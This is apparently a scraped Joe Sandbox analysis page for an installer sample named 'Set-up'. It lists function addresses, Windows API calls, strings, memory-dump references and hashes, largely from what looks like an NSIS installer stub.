                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                      • String ID:
                                      • API String ID: 2568930968-0
                                      • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                      • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                      • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                      • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                      Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?), ref: 004020A3
                                      • GetClientRect.USER32(00000000,?), ref: 004020B0
                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                      • DeleteObject.GDI32(00000000), ref: 004020EE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                      • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                      • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                      • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                      Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                      • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                      • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                      • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                      Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                      • wsprintfW.USER32 ref: 00404483
                                      • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s
                                      • API String ID: 3540041739-3551169577
                                      • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                      • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                      • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                      • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                      Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                      • DeleteRegKey: "%s\%s", xrefs: 00402843
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                      • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                      • API String ID: 1697273262-1764544995
                                      • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                      • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                      • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                      • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                      Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                        • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                      • lstrlenW.KERNEL32 ref: 004026B4
                                      • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                      • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                      • String ID: CopyFiles "%s"->"%s"
                                      • API String ID: 2577523808-3778932970
                                      • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                      • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                      • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                      • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                      Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: lstrcatwsprintf
                                      • String ID: %02x%c$...
                                      • API String ID: 3065427908-1057055748
                                      • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                      • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                      • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                      • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                      Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 00405083
                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                      • String ID: Section: "%s"$Skipping section: "%s"
                                      • API String ID: 2266616436-4211696005
                                      • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                      • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                      • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                      • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                      Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(?), ref: 00402100
                                      • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426EE3,74DF23A0,00000000), ref: 00406902
                                      • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                      • String ID:
                                      • API String ID: 1599320355-0
                                      • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                      • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                      • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                      • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                      Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                      • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                      • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                      • String ID: Version
                                      • API String ID: 512980652-315105994
                                      • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                      • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                      • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                      • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                      Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                      • GetTickCount.KERNEL32 ref: 00403303
                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                      • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                      • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                      • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                      Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                      • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                      • String ID:
                                      • API String ID: 2883127279-0
                                      • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                      • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                      • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                      • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                      Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0040492E
                                      • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                        • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                      • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                      • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                      • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                      Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringlstrcmp
                                      • String ID: !N~
                                      • API String ID: 623250636-529124213
                                      • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                      • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                      • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                      • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                      Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                      Download Yara Rule
                                      APIs
